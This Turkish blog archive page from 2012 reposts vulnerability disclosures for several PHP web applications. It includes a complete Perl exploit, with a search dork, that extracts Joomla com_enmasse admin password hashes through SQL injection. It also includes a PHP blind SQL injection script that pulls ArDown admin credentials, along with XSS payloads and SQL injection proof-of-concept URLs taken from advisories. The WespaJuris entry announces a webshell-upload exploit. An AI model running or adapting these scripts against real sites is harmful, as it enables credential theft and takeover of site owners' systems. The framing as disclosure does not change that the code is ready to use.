Archive for 08 Ağustos 2012

admin | 08 Ağustos 2012
No comments

WespaJuris 3.0 Multiple Vulnerabilities

WespaJuris 3.0 Multiple Vulnerabilities

WespaJuris 3.0 açıkları yayınlandı Açıkların açıklaması ve exploiti ektedir.

_______________________________________________

# Exploit Title: WespaJuris <= 3.0 auto exploit
# Date: 07th august 2012
# Exploit Author: WhiteCollarGroup
# Vendor Homepage: http://www.wespadigital.com.br/
# Software Link: http://www.wespadigital.com.br/download/wespajuris_v3_0_2012.rar
# Version: 3.0
# Tested on: Apache Server
WespaJuris is a software for law firms.
Use this exploit to upload a webshell on vulnerable applications.
Usage:
    php exploit.php
Category: Genel |
admin | 08 Ağustos 2012
No comments

Joomla com_enmasse SQL injection Açığı

Joomla com_enmasse eklentisinde SQL injection Açığı bulundu. Bilindiği üzere joomlanın eklentilerinin çok büyük bölümünde SQL injection açığı bulunmuştu. Görüldüğü gibi halen daha eklentilerde sql injection açıkları bulunmaya devam ediliyor. SQL injetion ve perl exploit. Bir an önce kapatılması gerekir.

____________________________________________________________

#!/usr/bin/perl -w

 

########################################

# Exploit Title: Joomla com_enmasse Remote Exploit

#

# Dork: inurl:index.php?option=com_enmasse

#

# Date: [06-08-2012]

#

# Author: Daniel Barragan “D4NB4R”

#

# Twitter:

#

# site: http://poisonsecurity.wordpress.com/

#

# Vendor: http://www.matamko.com/

#

# Version: 1.2.0.4 (last update on Jul 27, 2012)

#

# License: Enmasse 6 Months Support & Subscription –  USD$358.20

#

# Demo: http://www.matamko.com/products/filexpress/live-demo.html

#

# Tested on: [Linux(bt5)-Windows(7ultimate)]

#

# Gretz: r0073r, indoushka, Ksha, Devboot, pilotcast, shine, aku, navi, dedalo etc….

########################################

 

print “\t\t\n\n”;

print “\t\n”;

print “\t            Daniel Barragan  D4NB4R                \n”;

print “\t                                                   \n”;

print “\t        Joomla com_enmasse Remote Exploit \n”;

print “\t\n\n”;

 

use LWP::UserAgent;

print “\nIngrese el Sitio:[http://wwww.site.com/path/]: “;

 

chomp(my $target=<STDIN>);

 

$concatene=”concat(password)”;

$table=”jos_users”;

$d4nb4r=”floor”;

$com=”com_enmasse”;

$seleccione=”select”;

 

 

$b = LWP::UserAgent->new() or die “Could not initialize browser\n”;

$b->agent(‘Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)’);

 

$host = $target . “index.php?categoryId=1&controller=deal&keyword=1&locationId=1&option=”.$com.”&sortBy=117 and(“.$seleccione.” 1 from(“.$seleccione.” count(*),concat((“.$seleccione.” (“.$seleccione.” (“.$seleccione.” “.$concatene.” from “.$table.” Order by username limit 0,1) ) from `information_schema`.tables limit 0%2C1)%2C”.$d4nb4r.”(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1″;

 

$res = $b->request(HTTP::Request->new(GET=>$host));

$answer = $res->content; if ($answer =~/([0-:a-fA-F]{32})/)  {

 

print “\n Hash Admin : $1\n\n”;

print ” El exploit fue exitoso si desea ver mas datos modifique el script\n”;

print ” The exploit was successful if you want to see more data modify the script\n”;

 

}

else{print “\n[-] No se pudo, intente manualmente\n”;}

 

#####Daniel Barragan D4NB4R 2012################

Category: Genel | Tags: , ,
admin | 08 Ağustos 2012
No comments

ArDown Remote Blind SQL Injection

ArDown un Tüm versiyonlarında Uzaktan Remote Blind SQL injection açığı bulundu. Açığın kullanımına ilişkin script aşağıda olup kapatılmalıdır.

_______________________________________________
ArDown (All Version) <- Remote Blind SQL Injection

<?php echo ”    [*]———————————————————————–[*]     # Exploit Title  : ArDown (All Version) <- Remote Blind SQL Injection     # Google Dork    : ‘powered by AraDown’     # Date           : 08/07/2012     # Exploit Author : G-B     # Email          :     # Software Link  : http://aradown.info/     # Version        : All Version [*]———————————————————————–[*]

[*] Target -> “;

$target = stdin(); $ar = array(‘1′,’2′,’3′,’4′,’5′,’6′,’7′,’8′,’9′,’0′,’a’,’b’,’c’,’d’,’e’,’f’,’g’,’h’,’i’,’j’,’k’,’l’,’m’,’n’,’o’,’p’,’

q’,’r’,’s’,’t’,’u’,’v’,’w’,’x’,’y’,’z’);

echo “[*] Username : “;

for($i=1;$i<=30;$i++){     foreach($ar as $char){         $b = send(‘http://server’,”3′ and (select substr(username,$i,1) from aradown_admin)=’$char’ # “);         if(eregi(‘<span align=”center”></span>’,$b) && $char == ‘z’){             $i = 50;             break;         }         if(eregi(‘<span align=”center”></span>’,$b)) continue;         echo $char;         break;     } }

echo “\n[*] Password : “;

for($i=1;$i<=32;$i++){     foreach($ar as $char){         $b = send(‘http://server’,”3′ and (select substr(password,$i,1) from aradown_admin)=’$char’ # “);         if(eregi(‘<span align=”center”></span>’,$b)) continue;         echo $char;         break;     } }

function send($target,$query){     $ch = curl_init();     curl_setopt($ch,CURLOPT_URL,”$target/ajax_like.php”);     curl_setopt($ch,CURLOPT_POST,true);     curl_setopt($ch,CURLOPT_POSTFIELDS,array(‘id’=>$query));     curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);     $r = curl_exec($ch);     curl_close($ch);     return $r; } function stdin(){     $fp = fopen(“php://stdin”,”r”);     $line = trim(fgets($fp));     fclose($fp);     return $line; } ?>

__________________________________________________________________

 

Category: Genel | Tags: ,
admin | 08 Ağustos 2012
No comments

iAuto Mobile Application 2012 Multiple Vulnerabilities

iAuto Mobile Application 2012 Versiyonundaki Açıklar

Title:  iAuto Mobile Application 2012 – Multiple Web Vulnerabilities

Date: 2012-07-11

References: http://www.vulnerability-lab.com/get_content.php?id=658

VL-ID: 658

Common Vulnerability Scoring System:  3.5

Introduction: With Internet on mobile devices booming, having a desktop-oriented version is just not enough anymore. Empower your visitors with content designed for mobile Web by offering them a mobile version of your classifieds website. WorksForWeb is offering custom-made mobile frontend addons for our classified solutions. The mobile version of your website will present all the data of the regular website in the format optimized for iPhone, Android, iPad, BlackBerry, Symbian, or other mobile devices. Mobile frontend addon features:

Quick and advanced search,     Browsing,     Tabbed design,     Multi-language interface,     Google Maps,     And much more

Addon is seamlessly integrated with your main website. Your website automatically detects mobile browsers to redirect mobile visitors to the mobile-optimized content. Why do you need a mobile gateway to your website? Because all the market leaders have mobile access, and so should you. The mobile technology is redefining our future, and you should be one step ahead of your smaller competitors. Mobile users now make up a large percentage of your target audience, and their needs to access information easily are important to address. At this moment, the mobile addon is compatible with classified solutions of v.5.2 and above. The price of the mobile frontend addon is only $175. This price includes a free expert installation on your server.

(Copy of the Vendor Homepage: http://www.worksforweb.com/classifieds-software/addons/mobile-addon/ )

Abstract: The Vulnerability Laboratory Research Team discovered multiple cross site vulnerabilities in the iAuto Mobile APP for Android, iOS & Blackberry.

Report-Timeline: ================ 2012-07-10:  Public or Non-Public Disclosure

Status: ======== Published

Exploitation-Technique: ======================= Remote

Severity: ========= Medium

Details: ======== 1.1 A persistent input validation vulnerability is detected in the iAuto Mobile APP for Android, iOS (iPhone), Ericsson & Blackberry. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerability is located in comments module with the bound vulnerable commentSid parameter. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action & privileged user account.

Vulnerable Module(s):         [+] Comments > Reply to The Comment Listing

Vulnerable Parameter(s):         [+] commentSid & commentInfo

1.2 Multiple non persistent cross site scripting vulnerabilities are detected in the iAuto Mobile APP for Android, iOS (iPhone), Ericsson & Blackberry. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user inter action or local low privileged user account. The bugs are located in the  Dealer > Search Sellers or Browse by Make and Model with the bound vulnerable parameters city & path/url. Successful exploitation can result in account steal, client side phishing & client-side content request manipulation. Exploitation requires medium or high user inter action & without privileged web application user account.

Vulnerable Module(s):         [+] Dealer > Search Sellers > City         [+] Browse by Make and Model > /../ >

Vulnerable Parameter(s):         [+] City         [+] Folder Access Listing

Proof of Concept: ================= 1.1 The persistent vulnerabilities can be exploited by remote attackers with low privileged user account and with low required user inter action. For demonstration or reproduce …

Review:  Add Comments – Listing

<div> <h1>Reply to The Comment</h1> <div> <div>You are replying to the comment #”><iframe src=”iAuto%20%20%20Listing%20Comments%20Reply%20to%20The%20Comment-Dateien/[PERSISTENT INJECTED CODE!])’ <=”” to=”” listing=”” #448=”” “<span=”” height=”900″ width=”1000″>2007</span> <span>Acura</span>

 

1.2 The client side cross site scripting vulnerabilities can be exploited by remote attackers with medium or highr equired user inter action. Fo demonstration or reproduce …

String: “><iframe src=http://vuln-lab.com width=1000 height=900 onload=alert(“VulnerabilityLab”) <

Dealer > Search Sellers > City

PoC: http://iauto.xxx.com/iAuto/m/users/search/?DealershipName[equal]=jamaikan-hope23&City[equal]=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+ width%3D1000+height%3D900+onload%3Dalert%28%22VulnerabilityLab%22%29+%3C&State[equal]=11&action=search

Browse by Make and Model / AC Cobra / >

PoC: http://iauto.xxx.com/iAuto/m/browse-by-make-model/AC+Cobra/%22%3E%3Ciframe%20src=http://vuln-lab.com%20 width=1000%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C/

Comments > Reply to The Comment > Topic & Text (commentSid)

PoC: http://iauto.xxx.com/iAuto/m/comment/add/?listingSid=448&commentSid=%22%3E%3Ciframe%20src=http://vuln-lab.com%20width=1000 %20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C&returnBackUri=%2Flisting%2Fcomments%2F448%2F%3F

Risk: ===== 1.1 The security risk of the persistent input validation vulnerability is estimated as medium(+).

1.2 The security risk of the non-persistent cross site scripting vulnerabilities are estimated as low(+)|(-)medium.

Credits: ======== Vulnerability Laboratory [Research Team]  –    Benjamin Kunz Mejri ()

Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com     – www.vuln-lab.com             – Contact:       –           – Section:    video.vulnerability-lab.com   – forum.vulnerability-lab.com            – news.vulnerability-lab.com Social:           –           – Feeds:      vulnerability-lab.com/rss/rss.php  – vulnerability-lab.com/rss/rss_upcoming.php   – vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact ( or ) to get a permission.

Copyright © 2012 | Vulnerability Laboratory

— VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT:

Category: Genel | Tags: , ,
admin | 08 Ağustos 2012
No comments

Openconstructor CMS Parameter Multiple SQL Injection

Openconstructor CMS 3.12.0 versiyonunda SQL injection açığı bulundu. openconstructor/getimage/showimage.php parametresinde bulunan açığın bir an önce kapatılması gerekiyor.

______________________________________________________________________

Title: Openconstructor CMS 3.12.0 ‘id’ parameter multiple SQL injection vulnerabilities

Affected Software:

http://www.openconstructor.org/

http://code./downloads/list

http://esectorsolutions.com/about/whats-new/esector-news/detailed/?id=234

Description:

Openconstructor (formerly known as eSector Solutions Web Constructor) is an open source web Content Management System written in PHP.

Multiple SQL injection vulnerabilities exist on the ‘id’ parameter, which is used across different sections of the application.

Verson 3.12.0 is vulnerable, previous version may be affected, but they have not been tested.

CVE CVE-2012-3873

 Impact: Authenticated attackers can execute arbitrary SQL queries.

CVSS Base Score: 9.0 (AV:N/AC:L/Au:S/C:C/I:C/A:C)

 Credits:Lorenzo Cantoni

 Details: The following lines of code are the cause of the issue:

 

  ds->get_record($_GET[‘id’])

 

get_record() perform a query on the database, without checking the user supplied data in the ‘id’ parameter. The following pages are vulnerable:

data/gallery/edit.php

data/guestbook/edit.php

data/file/edit.php

data/htmltext/edit.php

data/publication/edit.php

data/event/edit.php

 ‘getimage/showimage.php’ is also vulnerable, due to the following lines of code:

 $res = $db->query(

                ‘SELECT id, name, filename, size, type, date’.

                ‘ FROM dsfile’.

                ‘ WHERE id=’.$_GET[‘id’]

    );

 

Proof of Concept: An object (eg:gallery object, file object, guestbook object …) must first be created or has to already exist in order to exploit the vulnerability.

For instance, if a guestbook object has been created, an attacker can open it in edit page and exploit a blind SQL injection as follows:

AND 1=1 returns a TRUE value for the query

http://hostname/openconstructor/data/guestbook/edit.php?ds_id=1&id=4 AND 1=1 returns a FALSE value for the query

In my test environment, I have been able to confirm the possibility to execute queries with the following commands:

AND (select @)=’5.5.16-log’ returns a TRUE value for the query

http://hostname/openconstructor/data/guestbook/edit.php?ds_id=10&id=4 AND (select @)=’5.5.16-foo’ returns a FALSE value for the query

On ‘getimage/showimage.php’, an image file must be first successfully uploaded. The exploitation is very similar:

  returns a FALSE value for the query

http://hostname/openconstructor/getimage/showimage.php?id=1%20AND%20(select%20@)=’5.5.16-log’  return a TRUE value for the query

Disclosure

[08/07/2012] Lead Developer contacted.

[22/07/2012] No response. Sent another mail.

[04/08/2012] Still no response. Public disclosure.

Category: Genel | Tags: , , ,
« Older Entries   Recent Entries »